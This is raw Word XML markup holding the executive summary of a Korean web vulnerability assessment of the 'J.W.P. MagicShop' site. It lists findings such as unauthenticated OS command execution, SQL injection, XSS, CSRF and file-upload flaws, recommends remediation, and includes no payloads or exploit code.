      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A527310" w14:textId="77777777" w:rsidR="005D30D0" w:rsidRDefault="00802A7F" w:rsidP="003324FA">
      <w:pPr>
        <w:pStyle w:val="Level1TitleCtl1"/>
        <w:wordWrap/>
        <w:ind w:hanging="425"/>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_Toc206601957"/>
      <w:bookmarkStart w:id="53" w:name="_Toc209094546"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>취약점진단</w:t>
      </w:r>
      <w:r w:rsidR="005D30D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 결과요약</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p w14:paraId="5814FBDC"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54" w:name="_Toc3884121"/>
      <w:bookmarkStart w:id="55" w:name="_Toc4080331"/>
      <w:bookmarkStart w:id="56" w:name="_Toc4086364"/>
      <w:bookmarkStart w:id="57" w:name="_Toc4121238"/>
      <w:bookmarkStart w:id="58" w:name="_Toc4121416"/>
      <w:bookmarkStart w:id="59" w:name="_Toc4147266"/>
      <w:bookmarkStart w:id="60" w:name="_Toc4151550"/>
      <w:bookmarkStart w:id="61" w:name="_Toc4155623"/>
      <w:bookmarkStart w:id="62" w:name="_Toc4156727"/>
      <w:bookmarkStart w:id="63" w:name="_Toc4751831"/>
      <w:bookmarkStart w:id="64" w:name="_Toc4752087"/>
      <w:bookmarkStart w:id="65" w:name="_Toc5189544"/>
      <w:bookmarkStart w:id="66" w:name="_Toc5204844"/>
      <w:bookmarkStart w:id="67" w:name="_Toc5700673"/>
      <w:bookmarkStart w:id="68" w:name="_Toc35530814"/>
      <w:bookmarkStart w:id="69" w:name="_Toc206596228"/>
      <w:bookmarkStart w:id="70" w:name="_Toc206601397"/>
      <w:bookmarkStart w:id="71" w:name="_Toc206601958"/>
      <w:bookmarkStart w:id="72" w:name="_Toc206601978"/>
      <w:bookmarkStart w:id="73" w:name="_Toc206619097"/>
      <w:bookmarkStart w:id="74" w:name="_Toc206619216"/>
      <w:bookmarkStart w:id="75" w:name="_Toc206619238"/>
      <w:bookmarkStart w:id="76" w:name="_Toc206619260"/>
      <w:bookmarkStart w:id="77" w:name="_Toc206619288"/>
      <w:bookmarkStart w:id="78" w:name="_Toc206629571"/>
      <w:bookmarkStart w:id="79" w:name="_Toc206633193"/>
      <w:bookmarkStart w:id="80" w:name="_Toc206656047"/>
      <w:bookmarkStart w:id="81" w:name="_Toc206661018"/>
      <w:bookmarkStart w:id="82" w:name="_Toc206661056"/>
      <w:bookmarkStart w:id="83" w:name="_Toc206675293"/>
      <w:bookmarkStart w:id="84" w:name="_Toc206676481"/>
      <w:bookmarkStart w:id="85" w:name="_Toc206676654"/>
      <w:bookmarkStart w:id="86" w:name="_Toc206677832"/>
      <w:bookmarkStart w:id="87" w:name="_Toc206683145"/>
      <w:bookmarkStart w:id="88" w:name="_Toc206683297"/>
      <w:bookmarkStart w:id="89" w:name="_Toc207185834"/>
      <w:bookmarkStart w:id="90" w:name="_Toc207185988"/>
      <w:bookmarkStart w:id="91" w:name="_Toc207186142"/>
      <w:bookmarkStart w:id="92" w:name="_Toc207186488"/>
      <w:bookmarkStart w:id="93" w:name="_Toc207186646"/>
      <w:bookmarkStart w:id="94" w:name="_Toc207208214"/>
      <w:bookmarkStart w:id="95" w:name="_Toc207208368"/>
      <w:bookmarkStart w:id="96" w:name="_Toc207784706"/>
      <w:bookmarkStart w:id="97" w:name="_Toc207784743"/>
      <w:bookmarkStart w:id="98" w:name="_Toc207784781"/>
      <w:bookmarkStart w:id="99" w:name="_Toc207785050"/>
      <w:bookmarkStart w:id="100" w:name="_Toc207798423"/>
      <w:bookmarkStart w:id="101" w:name="_Toc207798567"/>
      <w:bookmarkStart w:id="102" w:name="_Toc207798711"/>
      <w:bookmarkStart w:id="103" w:name="_Toc207805987"/>
      <w:bookmarkStart w:id="104" w:name="_Toc207806023"/>
      <w:bookmarkStart w:id="105" w:name="_Toc207806202"/>
      <w:bookmarkStart w:id="106" w:name="_Toc209045501"/>
      <w:bookmarkStart w:id="107" w:name="_Toc209086057"/>
      <w:bookmarkStart w:id="108" w:name="_Toc209092805"/>
      <w:bookmarkStart w:id="109" w:name="_Toc209093694"/>
      <w:bookmarkStart w:id="110" w:name="_Toc209093978"/>
      <w:bookmarkStart w:id="111" w:name="_Toc209094405"/>
      <w:bookmarkStart w:id="112" w:name="_Toc209094547"/>
      <w:bookmarkStart w:id="113" w:name="_Toc388370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80F18F7"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14" w:name="_Toc3884122"/>
      <w:bookmarkStart w:id="115" w:name="_Toc4080332"/>
      <w:bookmarkStart w:id="116" w:name="_Toc4086365"/>
      <w:bookmarkStart w:id="117" w:name="_Toc4121239"/>
      <w:bookmarkStart w:id="118" w:name="_Toc4121417"/>
      <w:bookmarkStart w:id="119" w:name="_Toc4147267"/>
      <w:bookmarkStart w:id="120" w:name="_Toc4151551"/>
      <w:bookmarkStart w:id="121" w:name="_Toc4155624"/>
      <w:bookmarkStart w:id="122" w:name="_Toc4156728"/>
      <w:bookmarkStart w:id="123" w:name="_Toc4751832"/>
      <w:bookmarkStart w:id="124" w:name="_Toc4752088"/>
      <w:bookmarkStart w:id="125" w:name="_Toc5189545"/>
      <w:bookmarkStart w:id="126" w:name="_Toc5204845"/>
      <w:bookmarkStart w:id="127" w:name="_Toc5700674"/>
      <w:bookmarkStart w:id="128" w:name="_Toc35530815"/>
      <w:bookmarkStart w:id="129" w:name="_Toc206596229"/>
      <w:bookmarkStart w:id="130" w:name="_Toc206601398"/>
      <w:bookmarkStart w:id="131" w:name="_Toc206601959"/>
      <w:bookmarkStart w:id="132" w:name="_Toc206601979"/>
      <w:bookmarkStart w:id="133" w:name="_Toc206619098"/>
      <w:bookmarkStart w:id="134" w:name="_Toc206619217"/>
      <w:bookmarkStart w:id="135" w:name="_Toc206619239"/>
      <w:bookmarkStart w:id="136" w:name="_Toc206619261"/>
      <w:bookmarkStart w:id="137" w:name="_Toc206619289"/>
      <w:bookmarkStart w:id="138" w:name="_Toc206629572"/>
      <w:bookmarkStart w:id="139" w:name="_Toc206633194"/>
      <w:bookmarkStart w:id="140" w:name="_Toc206656048"/>
      <w:bookmarkStart w:id="141" w:name="_Toc206661019"/>
      <w:bookmarkStart w:id="142" w:name="_Toc206661057"/>
      <w:bookmarkStart w:id="143" w:name="_Toc206675294"/>
      <w:bookmarkStart w:id="144" w:name="_Toc206676482"/>
      <w:bookmarkStart w:id="145" w:name="_Toc206676655"/>
      <w:bookmarkStart w:id="146" w:name="_Toc206677833"/>
      <w:bookmarkStart w:id="147" w:name="_Toc206683146"/>
      <w:bookmarkStart w:id="148" w:name="_Toc206683298"/>
      <w:bookmarkStart w:id="149" w:name="_Toc207185835"/>
      <w:bookmarkStart w:id="150" w:name="_Toc207185989"/>
      <w:bookmarkStart w:id="151" w:name="_Toc207186143"/>
      <w:bookmarkStart w:id="152" w:name="_Toc207186489"/>
      <w:bookmarkStart w:id="153" w:name="_Toc207186647"/>
      <w:bookmarkStart w:id="154" w:name="_Toc207208215"/>
      <w:bookmarkStart w:id="155" w:name="_Toc207208369"/>
      <w:bookmarkStart w:id="156" w:name="_Toc207784707"/>
      <w:bookmarkStart w:id="157" w:name="_Toc207784744"/>
      <w:bookmarkStart w:id="158" w:name="_Toc207784782"/>
      <w:bookmarkStart w:id="159" w:name="_Toc207785051"/>
      <w:bookmarkStart w:id="160" w:name="_Toc207798424"/>
      <w:bookmarkStart w:id="161" w:name="_Toc207798568"/>
      <w:bookmarkStart w:id="162" w:name="_Toc207798712"/>
      <w:bookmarkStart w:id="163" w:name="_Toc207805988"/>
      <w:bookmarkStart w:id="164" w:name="_Toc207806024"/>
      <w:bookmarkStart w:id="165" w:name="_Toc207806203"/>
      <w:bookmarkStart w:id="166" w:name="_Toc209045502"/>
      <w:bookmarkStart w:id="167" w:name="_Toc209086058"/>
      <w:bookmarkStart w:id="168" w:name="_Toc209092806"/>
      <w:bookmarkStart w:id="169" w:name="_Toc209093695"/>
      <w:bookmarkStart w:id="170" w:name="_Toc209093979"/>
      <w:bookmarkStart w:id="171" w:name="_Toc209094406"/>
      <w:bookmarkStart w:id="172" w:name="_Toc209094548"/>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363D80BE"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73" w:name="_Toc3884123"/>
      <w:bookmarkStart w:id="174" w:name="_Toc4080333"/>
      <w:bookmarkStart w:id="175" w:name="_Toc4086366"/>
      <w:bookmarkStart w:id="176" w:name="_Toc4121240"/>
      <w:bookmarkStart w:id="177" w:name="_Toc4121418"/>
      <w:bookmarkStart w:id="178" w:name="_Toc4147268"/>
      <w:bookmarkStart w:id="179" w:name="_Toc4151552"/>
      <w:bookmarkStart w:id="180" w:name="_Toc4155625"/>
      <w:bookmarkStart w:id="181" w:name="_Toc4156729"/>
      <w:bookmarkStart w:id="182" w:name="_Toc4751833"/>
      <w:bookmarkStart w:id="183" w:name="_Toc4752089"/>
      <w:bookmarkStart w:id="184" w:name="_Toc5189546"/>
      <w:bookmarkStart w:id="185" w:name="_Toc5204846"/>
      <w:bookmarkStart w:id="186" w:name="_Toc5700675"/>
      <w:bookmarkStart w:id="187" w:name="_Toc35530816"/>
      <w:bookmarkStart w:id="188" w:name="_Toc206596230"/>
      <w:bookmarkStart w:id="189" w:name="_Toc206601399"/>
      <w:bookmarkStart w:id="190" w:name="_Toc206601960"/>
      <w:bookmarkStart w:id="191" w:name="_Toc206601980"/>
      <w:bookmarkStart w:id="192" w:name="_Toc206619099"/>
      <w:bookmarkStart w:id="193" w:name="_Toc206619218"/>
      <w:bookmarkStart w:id="194" w:name="_Toc206619240"/>
      <w:bookmarkStart w:id="195" w:name="_Toc206619262"/>
      <w:bookmarkStart w:id="196" w:name="_Toc206619290"/>
      <w:bookmarkStart w:id="197" w:name="_Toc206629573"/>
      <w:bookmarkStart w:id="198" w:name="_Toc206633195"/>
      <w:bookmarkStart w:id="199" w:name="_Toc206656049"/>
      <w:bookmarkStart w:id="200" w:name="_Toc206661020"/>
      <w:bookmarkStart w:id="201" w:name="_Toc206661058"/>
      <w:bookmarkStart w:id="202" w:name="_Toc206675295"/>
      <w:bookmarkStart w:id="203" w:name="_Toc206676483"/>
      <w:bookmarkStart w:id="204" w:name="_Toc206676656"/>
      <w:bookmarkStart w:id="205" w:name="_Toc206677834"/>
      <w:bookmarkStart w:id="206" w:name="_Toc206683147"/>
      <w:bookmarkStart w:id="207" w:name="_Toc206683299"/>
      <w:bookmarkStart w:id="208" w:name="_Toc207185836"/>
      <w:bookmarkStart w:id="209" w:name="_Toc207185990"/>
      <w:bookmarkStart w:id="210" w:name="_Toc207186144"/>
      <w:bookmarkStart w:id="211" w:name="_Toc207186490"/>
      <w:bookmarkStart w:id="212" w:name="_Toc207186648"/>
      <w:bookmarkStart w:id="213" w:name="_Toc207208216"/>
      <w:bookmarkStart w:id="214" w:name="_Toc207208370"/>
      <w:bookmarkStart w:id="215" w:name="_Toc207784708"/>
      <w:bookmarkStart w:id="216" w:name="_Toc207784745"/>
      <w:bookmarkStart w:id="217" w:name="_Toc207784783"/>
      <w:bookmarkStart w:id="218" w:name="_Toc207785052"/>
      <w:bookmarkStart w:id="219" w:name="_Toc207798425"/>
      <w:bookmarkStart w:id="220" w:name="_Toc207798569"/>
      <w:bookmarkStart w:id="221" w:name="_Toc207798713"/>
      <w:bookmarkStart w:id="222" w:name="_Toc207805989"/>
      <w:bookmarkStart w:id="223" w:name="_Toc207806025"/>
      <w:bookmarkStart w:id="224" w:name="_Toc207806204"/>
      <w:bookmarkStart w:id="225" w:name="_Toc209045503"/>
      <w:bookmarkStart w:id="226" w:name="_Toc209086059"/>
      <w:bookmarkStart w:id="227" w:name="_Toc209092807"/>
      <w:bookmarkStart w:id="228" w:name="_Toc209093696"/>
      <w:bookmarkStart w:id="229" w:name="_Toc209093980"/>
      <w:bookmarkStart w:id="230" w:name="_Toc209094407"/>
      <w:bookmarkStart w:id="231" w:name="_Toc209094549"/>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7080B7A9" w14:textId="77777777" w:rsidR="001C31CE" w:rsidRPr="004860A8" w:rsidRDefault="001C31CE" w:rsidP="009E4926">
      <w:pPr>
        <w:pStyle w:val="Level2TitleCtl2"/>
        <w:ind w:left="426" w:hanging="425"/>
      </w:pPr>
      <w:bookmarkStart w:id="232" w:name="_Toc206601961"/>
      <w:bookmarkStart w:id="233" w:name="_Toc209094550"/>
      <w:r w:rsidRPr="004860A8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>총평</w:t>
      </w:r>
      <w:bookmarkEnd w:id="113"/>
      <w:bookmarkEnd w:id="232"/>
      <w:bookmarkEnd w:id="233"/>
    </w:p>
    <w:p w14:paraId="724B2DD4" w14:textId="3594201F" w:rsidR="00BD66E9" w:rsidRDefault="007B6505" w:rsidP="005B2190">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLineChars="100" w:firstLine="200"/>
      </w:pPr>
      <w:r w:rsidRPr="00210D20">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00210D20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>J.W.P. MagicShop”</w:t>
      </w:r>
      <w:r>
        <w:t>의 총 1개의 사이트를 대상으로 웹 취약점진단을 진행한 결과, 입력값 검증 미흡(</w:t>
      </w:r>
      <w:r w:rsidR="006E139D">
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>건), 인증 및 접근통제 취약(3건), 취약한 기능 구현(3건) 등 총 1</w:t>
      </w:r>
      <w:r w:rsidR="006E139D">
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>건의 중요 취약점이 확인되었습니다. 이러한 취약점은 시스템에 직접적인 침입 및 데이터베이스 탈취를 통해 서버 권한 장악까지 이어질 수 있는 수준의 위험성을 의미합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70ECEF78" w14:textId="5ED53D0E" w:rsidR="00BD66E9" w:rsidRPr="007B6505" w:rsidRDefault="007B6505" w:rsidP="005B2190">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLineChars="100" w:firstLine="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>특히</w:t>
      </w:r>
      <w:r w:rsidR="0020627B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 입력값 검증 미흡으로 인해 운영체제 명령 실행 취약점이 발견되어 인증 없이 접근 가능한 관리자 페이지를 통해 파라미터 기반의 시스템 명령어(ls, pwd 등) 실행이 가능했고, 이는 서버 권한 탈취로 이어질 위험성이 존재합니다. 또한</w:t>
      </w:r>
      <w:r w:rsidR="00B801EF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL 인젝션 취약점을 통해 데이터베이스명, 테이블 및 컬럼 정보, 실제 데이터까지 추출이 가능하여 DBMS 정보 유출 위험이 확인되었습니다. 이와 함께 크로스사이트 스크립팅(XSS), 크로스사이트 리퀘스트 변조(CSRF), 파일 업로드</w:t>
      </w:r>
      <w:r w:rsidR="006E139D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>취약점 등이 다수 존재하여 악성 스크립트 실행, 웹쉘 업로드, 비인가 파일 접근 등의 위험이 발생할 수 있습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73ADF682" w14:textId="6BA2C7BB" w:rsidR="00BD66E9" w:rsidRPr="007B6505" w:rsidRDefault="007B6505" w:rsidP="005B2190">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLineChars="100" w:firstLine="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>또한</w:t>
      </w:r>
      <w:r w:rsidR="00BD66E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 관리자 페이지 관리가 미흡하여 인증 없이 접근 가능한 관리자 페이지 노출, 유추 가능한 URL을 통한 접근, 비인가 사용자의 관리자 기능 수행 가능 등의 취약점이 확인되었습니다. 이는 공격자가 별도의 제한 없이 중요 기능을 수행하거나 민감 정보를 탈취할 수 있는 위험을 가지고 있습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E73CB5" w14:textId="2EB97533" w:rsidR="00BD66E9" w:rsidRPr="007B6505" w:rsidRDefault="007B6505" w:rsidP="005B2190">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLineChars="100" w:firstLine="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>종합적으로</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 볼 때, J.W.P. MagicShop 웹 시스템은 입력값 검증, 인증, 접근통제 등 기본적인 보안 설정이 미흡한 상태로 구축되어 있어 전반적인 보안 수준이 매우 낮다고 판단됩니다. 특히 이번 진단은 서비스 영향도를 고려한 샘플링 방식으로 수행된 만큼, 실제 운영 환경에는 더 많은 취약점이 존재할 가능성이 높습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2862282F" w14:textId="545B7C1B" w:rsidR="00001FD3" w:rsidRDefault="007B6505" w:rsidP="005B2190">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLineChars="100" w:firstLine="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>자세한</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 사항은 아래 취약점진단 상세결과를 확인하시고 본 결과보고서와 함께 제공해드리는 보안 가이드라인을 참고하시어 적절한 보안 대책을 수립 후 조치하시길 권고 드립니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B713AC" w14:textId="68233D07" w:rsidR="00195E7A" w:rsidRPr="00041DFF" w:rsidRDefault="00195E7A" w:rsidP="00041DFF">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:snapToGrid/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39900E7F" w14:textId="6D1C2272" w:rsidR="00E32DED" w:rsidRDefault="004340E3" w:rsidP="00BF0DA6">
      <w:pPr>
        <w:pStyle w:val="af7"/>
        <w:ind w:left="400"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0016533F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>※</w:t>
      </w:r>
      <w:r w:rsidRPr="0016533F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> 본 진단은 </w:t>
      </w:r>
      <w:r w:rsidRPr="0016533F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>상용</w:t>
      </w:r>
      <w:r w:rsidRPr="0016533F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> 서버에서 </w:t>
      </w:r>
      <w:r w:rsidRPr="0016533F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>수행하였으며,</w:t>
      </w:r>
      <w:r w:rsidRPr="0016533F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00050F3D" w:rsidRPr="0016533F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">서비스 영향도 이슈로 인해 </w:t>
      </w:r>
      <w:r w:rsidR="007A3EB0" w:rsidRPr="0016533F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>메뉴(기능)</w:t>
      </w:r>
      <w:r w:rsidR="007A3EB0" w:rsidRPr="0016533F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00050F3D" w:rsidRPr="0016533F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>전수 진단이 아닌 샘플링</w:t>
      </w:r>
      <w:r w:rsidR="007A3EB0" w:rsidRPr="0016533F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0016533F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>동적 진단으로 진행하여 최소한의 취약 포인트만 확인하므로 다수의 취약점 누락 발생 가능성이 존재</w:t>
      </w:r>
      <w:r w:rsidR="00050F3D" w:rsidRPr="0016533F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>합니다.</w:t>
      </w:r>
      <w:r w:rsidR="00050F3D" w:rsidRPr="0016533F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00050F3D" w:rsidRPr="0016533F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>또한</w:t>
      </w:r>
      <w:r w:rsidRPr="0016533F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">, 발견된 취약점의 모든 취약 포인트를 식별하지 않으므로 유사 취약 포인트에 대해 </w:t>
      </w:r>
      <w:r w:rsidR="00A15E0E" w:rsidRPr="00A15E0E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>애플리케이션</w:t>
      </w:r>
      <w:r w:rsidR="00A15E0E" w:rsidRPr="00A15E0E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0016533F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>담당자 직접 확인 후 조치가 필요합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4D6A61" w14:textId="0DF6CA68" w:rsidR="00041DFF" w:rsidRPr="00041DFF" w:rsidRDefault="00041DFF" w:rsidP="00041DFF">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:snapToGrid/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF5BB4D" w14:textId="76080A99" w:rsidR="001C31CE" w:rsidRPr="002F404C" w:rsidRDefault="001C31CE" w:rsidP="009E4926">
      <w:pPr>
        <w:pStyle w:val="Level2TitleCtl2"/>
        <w:ind w:left="426" w:hanging="425"/>
      </w:pPr>
      <w:bookmarkStart w:id="234" w:name="_Toc3883705"/>
      <w:bookmarkStart w:id="235" w:name="_Toc206601962"/>
      <w:bookmarkStart w:id="236" w:name="_Toc209094551"/>
      <w:r w:rsidRPr="004860A8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>대상별 취약점 요약</w:t>
      </w:r>
      <w:bookmarkEnd w:id="234"/>
      <w:bookmarkEnd w:id="235"/>
      <w:bookmarkEnd w:id="236"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a5"/>
        <w:tblW w:w="9072" w:type="dxa"/>
        <w:tblInd w:w="534" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2304"/>
        <w:gridCol w:w="982"/>
        <w:gridCol w:w="4954"/>
        <w:gridCol w:w="832"/>
      </w:tblGrid>
      <w:tr w:rsidR="003B025C" w14:paraId="4C7FCD73" w14:textId="77777777" w:rsidTr="0016533F">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1926" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="double" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="411F5A88" w14:textId="77777777" w:rsidR="003B025C" w:rsidRPr="00B011A3" w:rsidRDefault="003B025C" w:rsidP="003324FA">
            <w:pPr>
              <w:pStyle w:val="TitleCtSht"/>
              <w:wordWrap/>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B011A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>대상(도메인)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="996" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="double" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6AE0DA10" w14:textId="77777777" w:rsidR="003B025C" w:rsidRDefault="003B025C" w:rsidP="003324FA">
            <w:pPr>
              <w:pStyle w:val="TitleCtSht"/>
              <w:wordWrap/>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>취약점</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F1A7CAA" w14:textId="77777777" w:rsidR="003B025C" w:rsidRPr="00B011A3" w:rsidRDefault="003B025C" w:rsidP="002F404C">
            <w:pPr>
              <w:pStyle w:val="TitleCtSht"/>
              <w:wordWrap/>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>심각도</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5299" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="double" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="462D727B" w14:textId="77777777" w:rsidR="003B025C" w:rsidRPr="00B011A3" w:rsidRDefault="003B025C" w:rsidP="003324FA">
            <w:pPr>
              <w:pStyle w:val="TitleCtSht"/>
              <w:wordWrap/>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B011A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>취약점 명칭</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="851" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="double" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="588DA1AA" w14:textId="77777777" w:rsidR="003B025C" w:rsidRPr="00B011A3" w:rsidRDefault="0016533F" w:rsidP="003324FA">
            <w:pPr>
              <w:pStyle w:val="TitleCtSht"/>
              <w:wordWrap/>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>개수</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501A54" w14:paraId="17E030B4" w14:textId="77777777" w:rsidTr="0016533F">
        <w:trPr>
